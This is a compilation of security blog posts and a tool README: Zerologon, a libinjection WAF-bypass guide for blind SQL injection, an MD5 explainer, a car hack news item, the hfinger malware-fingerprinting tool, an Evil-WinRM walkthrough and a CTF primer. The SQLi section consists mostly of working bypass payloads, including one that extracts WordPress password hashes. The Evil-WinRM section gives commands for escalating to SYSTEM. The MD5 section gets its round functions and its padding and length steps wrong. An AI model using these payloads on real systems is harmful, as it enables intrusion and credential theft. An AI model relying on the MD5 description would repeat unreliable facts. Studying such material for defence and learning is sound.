Secura urges everybody to install the patch on all their domain controllers as fast as possible. Please refer to Microsoft's advisory.

We published a test tool on Github, which you can download here: https://github.com/SecuraBV/CVE-2020-1472 that can tell you whether a domain controller is vulnerable or not. If you are interested in the technical details behind this pretty unique vulnerability and how it was discovered, download the whitepaper here.
For more information about the CVE, contact Secura at info@secura.com. Read more about Zerologon: CVE-2020-1472 in our whitepaper. If you have any questions, please contact us at info@secura.com.

Source: https://www.secura.com/blog/zero-logon
-
Advanced boolean-based SQLi filter bypass techniques

Learn how to bypass filters and Application Firewall rules using MySQL String Functions, Regex Functions, Conditional Select and Set Variables to exploit a blind (boolean-based) SQL Injection vulnerability.

This article aims to show you some techniques to exploit a SQL Injection vulnerability bypassing libinjection (running inside a Web Application Firewall). libinjection is an open-source SQL / SQLi tokenizer parser analyzer created by Nick Galbreath from Signal Sciences that aims to detect SQL Injection and XSS payloads. libinjection runs in many Web Application Firewalls because it performs better than a regular expression based ruleset. Despite this, it works well and it detects many SQLi payloads, and it can be bypassed by using specific SQL syntaxes such as MySQL string functions or conditional select.

Let's take a look at the following request that tries to check if the parameter id can be injectable with SQL syntax:

/index.php?id=1+AND+1=1

It is successfully identified by libinjection as an SQLi attempt. You can use a list of Arithmetic Operators, String Functions and Conditional Select syntaxes to bypass it.

Arithmetic operators

Consider you need to check a parameter with a numeric value 2 in order to see if it's vulnerable to SQL Injection. You can do it by replacing the number 2 with an arithmetic operation.
For example:

OPERATOR   DESCRIPTION        EXAMPLE          INJECTION
+          Addition           select 1 + 1     /index.php?id=1%2b1
-          Subtraction        select 3 - 1     /index.php?id=3-1
*          Multiplication     select 2 * 1     /index.php?id=2*1
/          Division           select 2 / 1     /index.php?id=2/1
DIV        Integer Division   select 2 DIV 1   /index.php?id=2+DIV+1

String Functions

libinjection intercepts most classic SQLi attempts like 1+OR+1=1 but, speaking of MySQL, it's possible to bypass its filters by using MySQL functions:

INSERT: Insert substring at specified position up to n characters
  /index.php?id=1+OR+1=insert(1,1,1,1)--
REPEAT: Repeat a string the specified number of times
  index.php?id=1+OR+1=repeat(1,1)--
REPLACE: Replace occurrences of a specified string
  /index.php?id=1+OR+1=replace(1,1,1)--
RIGHT: Return the specified rightmost number of characters
  /index.php?id=1+OR+1=right(1,1)--
WEIGHT_STRING: Return the weight string for a string
  /index.php?id=1+OR+weight_string("foo")=weight_string("foo")--
IF statement: Implements a basic conditional construct
  /index.php?id=IF(1,1,1)--

Expression and Comments to Bypass

As you might know, a useful technique that could help in bypassing filters is to insert comments inside the SQL syntax, such as sEleCt/*foo*/1.
This kind of payload is well blocked by WAFs that use libinjection, but the following syntax seems to bypass it well:

{`<string>`/*comment*/(<sql syntax>)}

For example, in a real scenario:

curl -v 'http://wordpress/news.php?id=\{`foo`/*bar*/(select+1)\}'

Following some other examples:

EXAMPLE                                                        INJECTION
select login from users where id={`foo`/*bar*/(select 2)};     /index.php?id={`foo`/*bar*/(select+2)}
select login from users where id={`foo`/*bar*/(select--2)};    /index.php?id={`foo`/*bar*/(select--2)}
select login from users where id={`foo`/*bar*/(select+2)};     /index.php?id={`foo`/*bar*/(select%2b2)}

In a real scenario, if you found a boolean-based SQL Injection, for example on a vulnerable WordPress plugin, and you need to bypass a WAF using libinjection to exploit it, you can brute-force and exfiltrate the password hash of a user by using the following payload:

/index.php?id={`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)}

In this case, the RLIKE operator makes me able to brute-force the hashed password value by checking the response body length after adding characters to the regular expression. For example (using any web fuzz tool):

RLIKE "(^)[$].*"          -> return ok (hash: $)
RLIKE "(^)[$][a].*"       -> error or different response body length
RLIKE "(^)[$][b].*"       -> error or different response body length
RLIKE "(^)[$][c].*"       -> return ok (hash: $c)
RLIKE "(^)[$][c][a].*"    -> error or different response body length
RLIKE "(^)[$][c][b].*"    -> error or different response body length
RLIKE "(^)[$][c][c].*"    -> return ok (hash: $cc)
etc...

Assignment Operators

The := assignment operator causes the user variable on the left hand side of the operator to take on the value to its right. The value on the right hand side may be a literal value, another variable storing a value, or any legal expression that yields a scalar value, including the result of a query (provided that this value is a scalar value).
You can perform multiple assignments in the same SET statement. You can perform multiple assignments in the same statement. Unlike =, the := operator is never interpreted as a comparison operator. This means you can use := in any valid SQL statement (not just in SET statements) to assign a value to a variable.

We can use all the syntaxes shown before (Expression, Comments, RLIKE, and Assignment Operator) too (thanks to @seedis https://github.com/seedis). For example:

/index.php?id=@foo:=({`if`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"^[$]"+limit+1)})+union+%23%0a+distinctrow%0b+select+@foo

This requires more explaining:

select id=1 by injecting SQL query
select id=2 by injecting SQL query

References

https://dev.mysql.com/doc/refman/8.0/en/arithmetic-functions.html
https://dev.mysql.com/doc/refman/5.7/en/expressions.html
https://dev.mysql.com/doc/refman/8.0/en/assignment-operators.html
https://github.com/coreruleset/coreruleset/issues/1167

theMiddle - OWASP Core Rule Set Developer, Co-Founder at Rev3rse Security, I ❤️ to break application firewalls.

Source: https://www.secjuice.com/advanced-sqli-waf-bypass/
-
Breaking Down: MD5 Algorithm

by Aditya Anand

The previous article that I wrote was on Breaking Down: SHA-1 Algorithm. I have explained the use and purpose of hashing over there, do have a look at it. After writing that I planned to write a whole series of articles explaining different hashing algorithms and maybe after that even some cryptographic algorithms and their functioning.

One of the major problems in the cybersecurity community is that as we get deep into security we gradually lose touch with how these algorithms actually work and end up only downloading and using these libraries without giving a second thought about their functionality. This article is an attempt for me to explain the functionality of this hashing algorithm to those who are starting out or those who want to review the basics once again.

Hashes are one of the most frequently used terms in the cyber security domain and are extremely useful for various tasks like checksums, file integrity verification, password verification etc. Here is a bird's eye-view of the entire hashing algorithm. Let's begin!

The MD5 hashing technique is where the SHA-1 technique has arrived from, hence these two are extremely similar. There are some more details I have mentioned over there that will make it easier for you to understand this entire functioning, so you can read that as well - Breaking Down: SHA-1 Algorithm. Ok, now that you have read it let's go through this whole thing and understand the functioning of MD5 hashing.

1. Append padding bits

Let's add a few bits to the message so that its length becomes equivalent to 64 bits less than a multiple of 512. The padding works by appending a 1 to the end of the message, and then the rest of the bits that need to be added are 0.

2. Append length bits

This is the step in which we add the remaining 64 bits to the message so that the length of the message becomes an exact multiple of 512. The bits that we add here depend on the length of the message (the original one without the padding): if the length of that message is 8 then we add 1 in the first eight bits and for the next fifty six bits we add 0, if the length was 64 then all the 64 bits are 1 and if the length is greater than 64 then we calculate the modulus and append that many 1's and the rest of the 64 bits will be 0's.

3. Initialise MD buffer

This is one of the most important steps of all where we have four different buffers (A, B, C & D) and each one of them is 32 bits long. Their initial default values (little-endian):

A = 0x67452301
B = 0xefcdab89
C = 0x98badcfe
D = 0x10325476

4. Process each 512 bit block

Now, let's go back to our initial discussion where we saw that we perform a total of 64 operations on each of the 512 bit chunks. These operations are divided into 4 rounds with 16 operations in each round. The image below gives a pictorial representation of the entire compression function, i.e. the entire 64 operations.

The peculiarity of each of these rounds is that in every round there are unique functions, depicted below:

F(B,C,D) = (B AND D) OR ((NOT B) AND D)
G(B,C,D) = (B AND D) OR (C AND (NOT D))
H(B,C,D) = B XOR C XOR D
I(B,C,D) = C XOR (B OR (NOT D))

For the first round, which consists of 16 operations, we will use F(B,C,D), then G(B,C,D), then H(B,C,D) and for the last round I(B,C,D).

The 512 bit message chunk is further divided into 16 parts, each of them 32 bits; we refer to them as M(1), M(2) and so on. We have a fixed value K(i) which is unique for each operation, i.e. there are 64 K(i), mentioned below (little-endian).

K[ 0.. 3] := { 0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee }
K[ 4.. 7] := { 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501 }
K[ 8..11] := { 0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be }
K[12..15] := { 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821 }
K[16..19] := { 0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa }
K[20..23] := { 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8 }
K[24..27] := { 0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed }
K[28..31] := { 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a }
K[32..35] := { 0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c }
K[36..39] := { 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70 }
K[40..43] := { 0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05 }
K[44..47] := { 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665 }
K[48..51] := { 0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039 }
K[52..55] := { 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1 }
K[56..59] := { 0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1 }
K[60..63] := { 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 }

We also carry out a left bit rotation in each of the operations and there is an amount set for every operation of every function. The number of bits we need to rotate left by is depicted by 's'. The values of s for each operation are mentioned below.

s[ 0..15] := { 7,12,17,22,7,12,17,22,7,12,17,22,7,12,17,22 }
s[16..31] := { 5,9,14,20,5,9,14,20,5,9,14,20,5,9,14,20 }
s[32..47] := { 4,11,16,23,4,11,16,23,4,11,16,23,4,11,16,23 }
s[48..63] := { 6,10,15,21,6,10,15,21,6,10,15,21,6,10,15,21 }

Now that we have the values that are required to carry out each operation, we can focus on each and every round and how they function.

5. Output message digest

The image here shows how every operation takes place. Inside every operation there is again a set of functions that are performed which provides us with the output, which in turn acts as input for the next operation.
We carry out these operations over and over again till we reach the last chunk of the 512 bit message, and so the output that we obtain after processing the last chunk is the actual MD5 hash, which is of 128 bits, as each of A, B, C & D is 32 bits and combined together they form the total 128 bits.

Conclusion

The MD5 hashing algorithm has already been broken and it basically should not be used at any place like banking and e-commerce websites. To have a look at the entire working of the MD5 hashing, let's go through it once again.

The message that needs to be hashed is first broken down into 448 bit pieces and for the last piece we carry out padding. An extra 64 bits is appended to it taking the total number of bits to 512 bits; this acts as a message block going ahead. This message block of 512 bits is broken down into 16 parts of 32 bits each, which then act as input for the operation that we carry out in the next step.

Now let's get into the main part of the hashing algorithm: there are a total of 64 operations that are performed on the 512 bit message block. These operations are initiated with the default values that I mentioned above (A, B, C & D). There is a set of functions that are performed in each of these operations; the functions are already defined and so are the values which they are going to use. The 64 operations that we perform are also divided into 4 different rounds, and each round has a distinct set of functions. The 32 bit part of the message that we have broken down acts as an input (depicted in the above image) and there are predefined values of K(i) as well, already mentioned above; the next step is to perform the rotate left function, and the number of bits the program rotates left is already defined as well. When an entire operation is done it passes on its values to the next operation.
After 64 such operations are performed on the first 512 bit message block, the output is then passed on for the next operation to be carried out on the next 512 bits till the last message block is reached. The output we receive from the operations performed on the last message block is the hash of the original message, of 128 bits. So that's the short version of the whole functioning of the MD5 algorithm.

Depiction of every operation

About the Author

CyberSec professional, crazy about tinkering with computers. I am a bug hunter and specialise in helping companies and organisations by finding bugs in their web / mobile applications and helping them solve them. Freelancing in the field of networking and cybersecurity. Spend my days working on Kali. Well-versed programmer in C, C++, Bash Script and JAVA language.

Website: aditya12anand.com | Donate: paypal.me/aditya12anand
Telegram: https://t.me/aditya12anand
Twitter: twitter.com/aditya12anand
LinkedIn: linkedin.com/in/aditya12anand/
E-mail: aditya12anand@protonmail.com

The article was originally published at: https://medium.com/bugbountywriteup/breaking-down-md5-algorithm-92803c485d25

Source: https://pentestmag.com/breaking-down-md5-algorithm/
-
Mercedes-Benz C-Class W203 Instrument Cluster Hacked to Display Custom Text

12 Sep 2020, 11:19 UTC · by Bogdan Popa

There are many ways to upgrade the infotainment capabilities of an old car, and while most people turn to head unit upgrades to get new-gen systems like Apple CarPlay and Android Auto, these bring absolutely no change to the information that you get on the instrument cluster.

Needless to say, carmakers themselves don't provide too many customization options for the displays incorporated in the instrument panel, pretty much because the focus here should be on the speedometer and the other data related to the vehicle health status. The digital dash push has more or less changed this in the last few years, but as far as an older car is concerned, the options that are available for their owners are incredibly limited.

A reverse engineer, however, has found a way to break into the instrument cluster system available on the 2006 Mercedes-Benz C-Class W203, eventually being able to display custom text and messages, as well as music playback controls.

This isn't something that everyone can do, there's no doubt about it, but the developer has also published the full documentation on GitHub, so anyone with the right skills and an older C-Class W203 can technically do the same thing if they follow the provided instructions.

The hack is powered by an Android tablet connected to the CAN bus in the car, something that also allowed the developer to customize additional features of the C-Class, including the lighting system.

At the end of the day, a lot of work has been put into this project, so it goes without saying it's not something that any Average Joe can just run to get access to their car's instrument cluster backend settings without knowing anything about coding or how the installed controllers work.
And while for some it might seem easier to just replace the screen in the car, this isn't actually possible in the W203, and the developer himself explains that designing a new instrument panel is pretty much the only alternative to this reverse engineering project.

Source: https://www.autoevolution.com/news/mercedes-benz-c-class-w203-instrument-cluster-hacked-to-display-custom-text-148623.html
-
Hfinger - fingerprinting HTTP requests

Tool for fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage.

Its main objective is to provide a representation of malware requests in a shorter form than printing the whole request, but still human interpretable. This representation should be unique between malware families, which means that any fingerprint should be seen only for one particular family.

An academic paper accompanies work on this tool, describing, for example, the motivation of design choices. It will be published here after the peer-review process.

The idea

The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis, for example grouping of similar requests - at this moment it is still work in progress.

After analysis of malware's HTTP requests and headers, some parts of requests were identified as being most distinctive. These include:

Request method
Protocol version
Header order
Popular headers' values
Payload length, entropy and presence of non-ASCII characters

Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in detail here. The above features are translated into a varying length representation, which is the actual fingerprint. Depending on the report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the upcoming academic paper.

Installation

At this moment hfinger is distributed only via this repository. Tshark is required before installation - tested on Xubuntu 20.04 LTS with the tshark package in version 3.2.3. Please note that, as with any PoC, you should run it in a python virtual environment.
Its setup is not covered here, but you can try this tutorial. Hfinger installation:

Download the repository.
Unpack it to a chosen location.
In a terminal, change directory to the main catalogue of the unpacked repo.
Enable venv.
Run python3 setup.py install

Hfinger should be installed and ready to use.

Usage

Calling the tool from a command line:

usage: hfinger.py [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2}]

Hfinger - fingerprinting HTTP requests stored in pcap files

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  Read single pcap file
  -d DIR, --directory DIR
                        Read pcap files from directory DIR
  -o output_path, --output-path output_path
                        Path to the output directory
  -m {0,1,2}, --mode {0,1,2}
                        Fingerprint report mode. 0 - optimal (default), 1 - informative, 2 - all features

You must provide the path to a pcap file (-f) or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example the output of the command:

python3 hfinger.py -f example.pcap -o /tmp/pcap

will be saved to:

/tmp/pcap/example.pcap.json

When any issues are encountered, for example finding an unknown header, they are printed to standard error output, so please monitor it.

Fingerprint creation

An example of a POST request is presented below.

POST /dir1/dir2?var1=val1 HTTP/1.1
Host: 127.0.0.1:8000
Accept: */*
User-Agent: My UA
Content-Length: 9
Content-Type: application/x-www-form-urlencoded

misc=test

The fingerprint created by hfinger in the default report mode for this request is presented below. Particular features of the fingerprint are separated using |. They are described below in the order of appearance in the fingerprint.
Firstly, URL features are extracted:

URL length represented as a logarithm base 10 of the length,
extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt (in the example it is empty as the request does not contain it),
number of variables in the URL (in the example there is only one variable, var1).

Secondly, header structure features are analyzed:

request method encoded as the first two letters of the method (PO),
protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9),
and popular headers and their values.

When analyzing popular headers, the request is checked to see if they appear in it. These headers are:

Connection
Accept-Encoding
Content-Encoding
Cache-Control
TE
Accept-Charset
Content-Type
Accept
Accept-Language
User-Agent

When a header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to hfinger/configs/headerslow.json and the value is encoded according to tables stored in the hfinger/configs directory. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into the fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table it is hashed using the FNV1a hash. Also, if it is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is hashed with FNV. Finally, the values of the User-Agent and Accept-Language headers are directly hashed using FNV.

Some of the hfinger report modes provide a list of headers in order of appearance in the request. The list is created using a similar method as described above.
The header names are encoded using hfinger/configs/headerslow.json and separated with ,. If the header name does not start with an upper case letter (or any of its parts, when analyzing compound headers such as Accept-Encoding), then the encoded representation is prefixed with !. If the header name is not on the list of known headers, it is hashed using FNV.

Finally, in the payload features, the length of the payload is represented as a base 10 logarithm of the actual payload length, rounded to an integer.

Please note that the above description of fingerprint creation covers the default feature set. Hfinger is equipped with other feature sets, which can be chosen depending on the required amount of information. They are available via the report modes switch.

Report modes

Hfinger operates in three fingerprint report modes, which differ in the information extracted from requests: optimal, informative, all features. The modes were chosen in order to balance hfinger's capability to uniquely identify malware families against its capability to generalize information about the requests. A description of the features is provided here. The all features mode provides the most unique fingerprints; however, it produces a bigger number of fingerprints than the other two modes. The optimal mode provides slightly less unique fingerprints, but also significantly reduces the number of fingerprints. The informative mode is similar to optimal regarding uniqueness; however, it produces more fingerprints for the price of giving more information about the URL, headers and payload.
The modes consist of feature sets:

optimal (the default - option 0):
- URL length, represented as a base 10 logarithm of the actual length,
- extension of the requested file,
- number of variables in the URL,
- request method,
- protocol version,
- popular headers and their values,
- payload length, represented as a base 10 logarithm of the actual length rounded to an integer.

informative (option 1):
- URL length, represented as a base 10 logarithm of the actual length,
- number of directories in the URL,
- extension of the requested file,
- number of variables in the URL,
- request method,
- protocol version,
- order of headers,
- popular headers and their values,
- payload length, represented as a base 10 logarithm of the actual length rounded to an integer,
- payload entropy, represented as an integer.

all features (option 2):
- URL length, represented as a base 10 logarithm of the actual length,
- number of directories in the URL,
- average length of a directory in the URL, represented as a base 10 logarithm of the actual average length,
- extension of the requested file,
- length of the variable part of the URL, represented as a base 10 logarithm of the length and rounded to an integer,
- number of variables in the URL,
- average value length, represented as a base 10 logarithm of the actual average value length rounded to an integer,
- request method,
- protocol version,
- order of headers,
- popular headers and their values,
- presence of non-ASCII characters ("N" when such characters are present and "A" when they are not),
- payload length, represented as a base 10 logarithm of the actual length,
- payload entropy.

Source: https://github.com/CERT-Polska/hfinger
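To make the encoding rules above concrete, here is a simplified re-implementation of the default (optimal) fingerprint for one raw HTTP request. It is an example added to this post, not hfinger's own code, and it makes several assumptions: 32-bit FNV-1a; URL length kept to one decimal place; an empty body encoded as 0; and abbreviation tables cut down to the entries the post names (ac, as-as, te-as) plus a few invented ones (ho, us-ag, co-ty and so on), with every other name or value hashed. hfinger's real tables live under hfinger/configs/ and its output wraps the fingerprint in JSON, which is skipped here.

```python
import math
from urllib.parse import parse_qsl, urlsplit

# Abbreviation tables. hfinger keeps its own under hfinger/configs/; "ac", "as-as"
# and "te-as" are taken from the post above, the remaining entries are assumptions.
HEADER_ABBREV = {
    "accept": "ac", "accept-encoding": "ac-en", "accept-language": "ac-la",
    "accept-charset": "ac-ch", "cache-control": "ca-co", "connection": "co",
    "content-encoding": "co-en", "content-type": "co-ty", "te": "te",
    "user-agent": "us-ag", "host": "ho", "content-length": "co-le",
}
VALUE_ABBREV = {"*/*": "as-as", "text/*": "te-as"}
POPULAR = {"connection", "accept-encoding", "content-encoding", "cache-control", "te",
           "accept-charset", "content-type", "accept", "accept-language", "user-agent"}
HASH_WHOLE = {"user-agent", "accept-language"}   # values are always hashed, never looked up
KNOWN_EXT = {"php", "html", "htm", "asp", "aspx", "jsp", "exe", "js", "css", "txt"}  # assumed subset


def fnv1a32(data: bytes) -> int:
    """32-bit FNV-1a (the hash width hfinger uses is an assumption here)."""
    h = 0x811C9DC5
    for b in data:
        h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
    return h


def fnv_hex(text: str) -> str:
    return f"{fnv1a32(text.encode()):08x}"


def parse_request(raw: str):
    """Split a raw request into method, target, HTTP version, ordered headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, proto = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, proto.split("/", 1)[1], headers, body


def encode_name(name: str) -> str:
    key = name.lower()
    return HEADER_ABBREV.get(key) or fnv_hex(key)


def encode_value(name: str, value: str) -> str:
    # User-Agent, Accept-Language and anything carrying q= are hashed as a whole
    if name.lower() in HASH_WHOLE or "q=" in value:
        return fnv_hex(value)
    tokens = [t.strip() for t in value.split(",")]
    return ",".join(VALUE_ABBREV.get(t) or fnv_hex(t) for t in tokens)


def header_order(headers) -> str:
    """Header-order feature (informative/all modes): ! marks names that are not capitalised."""
    codes = []
    for name, _ in headers:
        code = encode_name(name)
        if any(part and not part[0].isupper() for part in name.split("-")):
            code = "!" + code
        codes.append(code)
    return ",".join(codes)


def fingerprint(raw: str) -> str:
    """Default-mode fingerprint: url_len|ext|nvars|method|version|headers|payload_len."""
    method, target, version, headers, body = parse_request(raw)
    parts = urlsplit(target)
    url_len = round(math.log10(len(target)), 1)             # one decimal place: assumption
    last = parts.path.rsplit("/", 1)[-1]
    ext = last.rpartition(".")[2].lower() if "." in last else ""
    if ext not in KNOWN_EXT:
        ext = ""
    nvars = len(parse_qsl(parts.query, keep_blank_values=True))
    version_code = {"1.1": "1", "1.0": "0", "0.9": "9"}.get(version, version)
    pairs = [f"{encode_name(n)}:{encode_value(n, v)}" for n, v in headers if n.lower() in POPULAR]
    payload = round(math.log10(len(body))) if body else 0    # empty body -> 0: assumption
    return "|".join([str(url_len), ext, str(nvars), method[:2].upper(), version_code,
                     "/".join(pairs), str(payload)])


# The POST request from the post above, as it would decode from the wire
EXAMPLE_REQUEST = (
    "POST /dir1/dir2?var1=val1 HTTP/1.1\r\n"
    "Host: 127.0.0.1:8000\r\n"
    "Accept: */*\r\n"
    "User-Agent: My UA\r\n"
    "Content-Length: 9\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "misc=test"
)

if __name__ == "__main__":
    print(fingerprint(EXAMPLE_REQUEST))
```

For the example request this yields 1.3 for the 20-character URL, an empty extension, one variable, PO, 1, three header pairs starting with ac:as-as (User-Agent and Content-Type fall back to hashes), and 1 for the 9-byte body. Only Host and Content-Length are skipped because they are not on the popular-header list, which is also why two different hosts sending the same malware beacon end up with the same fingerprint.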
-
Run as SYSTEM using Evil-WinRM

This is a quick blog post on how to elevate to SYSTEM without the need for PSEXEC when you are using PowerShell, or more specifically in this case, PowerShell Remoting (WinRM).

First off, let me introduce my tool of choice here. It’s Evil-WinRM. I spoke about it in the Practical Exploitation video here: https://www.youtube.com/watch?v=tVgJ-9FJKxE, so I won’t go too far in depth. It’s essentially the only WinRM tool that I’ve found to work well in a non-Windows native situation (also you can proxy it through proxychains which is AWESOME!!).

Anyways. I want to document how to run commands as SYSTEM without the use of PSEXEC. I found this technique on a 4sysops blog post called Running PowerShell Remotely As System with Invoke-CommandAs. Side note: you should definitely bookmark their blog, it’s great.

Invoke-CommandAs is not a native function of PowerShell, so you need to download it from the original author’s Github repo: https://github.com/mkellerman/Invoke-CommandAs

For our uses all you need to do is get these two particular files:

    https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Public/Invoke-CommandAs.ps1
    https://github.com/mkellerman/Invoke-CommandAs/blob/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps1

Here you can see me putting those two files into a scripts directory I made inside of the Evil-WinRM folder. (git clone https://github.com/Hackplayers/evil-winrm + bundle install)

    root@attacker:~/evil-winrm/scripts# ls
    Invoke-CommandAs.ps1
    root@attacker:~/evil-winrm/scripts# wget https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-
    --2020-09-13 20:17:56--  https://raw.githubusercontent.com/mkellerman/Invoke-CommandAs/master/Invoke-CommandAs/Private/Invoke-ScheduledTask.ps
    Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.200.133
    Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.200.133|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 10009 (9.8K) [text/plain]
    Saving to: 'Invoke-ScheduledTask.ps1'

    Invoke-ScheduledTask.ps1    100%[===========================================================================================

    2020-09-13 20:17:56 (5.37 MB/s) - 'Invoke-ScheduledTask.ps1' saved [10009/10009]

Once that’s ready, I run Evil-WinRM with the -s flag and specify the scripts directory I put the two files in.

    root@attacker:~/evil-winrm# ruby evil-winrm.rb -i 192.168.80.10 -u uberuser -s scripts/
    Enter Password:

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\uberuser\Documents>

Once I have the shell I load each of the scripts by typing out their file names (tab complete should work)

    *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-ScheduledTask.ps1
    *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs.ps1

Once they are loaded you need to run the menu command to load the functions into memory on the attacker's side. I haven’t looked at the code enough to know exactly why this is needed, but it doesn’t seem to work if you don’t.

    *Evil-WinRM* PS C:\Users\uberuser\Documents> menu

    [Evil-WinRM ASCII-art banner]

    By: CyberVaca, OscarAkaElvis, Laox @Hackplayers

    [+] Bypass-4MSI
    [+] Dll-Loader
    [+] Donut-Loader
    [+] Invoke-Binary
    [+] Invoke-CommandAs
    [+] Invoke-ScheduledTask

As we can see both of the needed functions are loaded and we can finally issue our commands as SYSTEM with the -AsSystem flag and the command being whoami:

    *Evil-WinRM* PS C:\Users\uberuser\Documents> Invoke-CommandAs -ScriptBlock {whoami} -AsSystem
    nt authority\system
    *Evil-WinRM* PS C:\Users\uberuser\Documents>

Source: https://malicious.link/post/2020/run-as-system-using-evil-winrm/
-
Beginner’s Guide To CTFs

How To Start With Security Capture The Flag Competitions.

Security CTFs, or Capture The Flag competitions, are a great way to learn how to hack. They are competitions where competitors compete to try to find a “flag” to prove that they have hacked into a system.

Why do CTFs?

They are one of the best ways to learn specific security skills, like binary exploitation, web exploitation or reverse engineering. And since you often play CTFs in teams, CTFs are also a great way to make friends with like-minded security nerds. There are many collegiate-level CTFs where you can compete with fellow students, and you’ll find that many practicing security professionals play CTFs as well.

Finally, CTFs train your hacker persistence. The CTF experience of getting stuck in a challenge, persisting and finally finding a solution models real-life hacking scenarios. CTFs teach you to remain patient and optimistic when you are stuck hacking.

Types of CTFs

There are two main types of CTFs: Jeopardy-style and Attack-Defense-style.

Jeopardy-style CTFs are essentially a list of hacking challenges that you can complete for flags that are worth a certain number of points. These challenges involve exploiting a vulnerability or solving a programming challenge to steal a “flag”. Teams compete to see who can find the most flags and gain the most points under a time limit. The hacking challenges in Jeopardy-style CTFs are often sorted by difficulty levels, so beginners can easily participate as well. There are often different skillsets that you can choose from, from cryptography, reversing, binary, web, programming, forensics, networking challenges to problems that are a mix of some or all of these skills.

A more advanced version of CTFs is the Attack-and-Defense-style CTF. In these competitions, teams defend their own servers against attack, and attack opponents’ servers to score. These CTFs require more skills to compete and are almost always done in teams. For example, the annual DEFCON CTF finals is an Attack-and-Defense-style CTF.

CTF skills

There are two very important things that you’d have to learn to do in order to start participating in the CTF world: finding teams and learning to gain new skills.

How to find teams

First, how do you find teams to enter CTF competitions? If you are a high school or college student, see if your school has a cybersecurity club. These clubs often have already established CTF teams that you can join and compete with. On the other hand, if your school does not already have a club, try starting one and gather like-minded people! Before you know it, you’d have a group of teammates who are passionate about hacking as well.

If you don’t belong to a school, social media is a great way to find teammates. Twitter is one of the best ways to reach out to people you want to collaborate with. Hacking forums and infosec Discord channels are also good for this.

How to gain the required technical skills

For beginner Jeopardy challenges, specific technical skills are often not required. After all, that is what you are trying to learn! However, it is good to have a basic understanding of how to use the command line and to have basic programming knowledge. More advanced technical skills can be gained by completing easier challenges or by googling. It is also helpful to keep in touch with the latest security news, as CTF challenges are often based on recently found vulnerabilities.

List Of CTFs To Play Now

Most CTF challenges run within a specific timeframe and are only available to registered teams. However, there are a large number of “always-online” Jeopardy-style CTFs that you can start playing right away. For a lot of these CTFs, you don’t need a team and can play without a time limit!

Web exploitation CTFs

Pentesterlab is a pretty good resource to start learning web penetration testing. In their challenges, you can read about the details of a vulnerability first before you exploit them hands-on. There are a wide variety of challenges available, from basic XSS to recently discovered web vulnerabilities.

The Hacker101 CTF is another good resource. It has a large list of simple challenges that are aimed at building web hacking skills, with a focus on vulnerabilities that are most likely to show up in bug bounty programs.

Reverse engineering CTFs

If reverse engineering is more your vibe, you can check out this site. Crackme hosts many broken programs that you can try to hack. You can find broken programs on a variety of platforms: Windows, Unix, and multi-platform. As a fun challenge, you can even write your own vulnerable program and share it with others!

Mixed CTFs

OverTheWire is the site that I recommend most beginners to start with. It is where I started playing CTF challenges. It starts with teaching the basics of using the command line and programming. Then you are given a wide range of challenges to choose from: from web security, binary exploitation to reverse engineering.

Hack This Site! is also a pretty good one. It is a little like OverTheWire in that it has a variety of challenges, ranging from super easy to advanced. It is also one of the few places where you can find forensics and steganography challenges if that’s what you are into.

Live CTFs

Finally, if you want to participate in a live CTF or an Attack-and-Defense-style CTF, check out CTFtime.org for a list of current and upcoming CTF events.

CTF Etiquette!

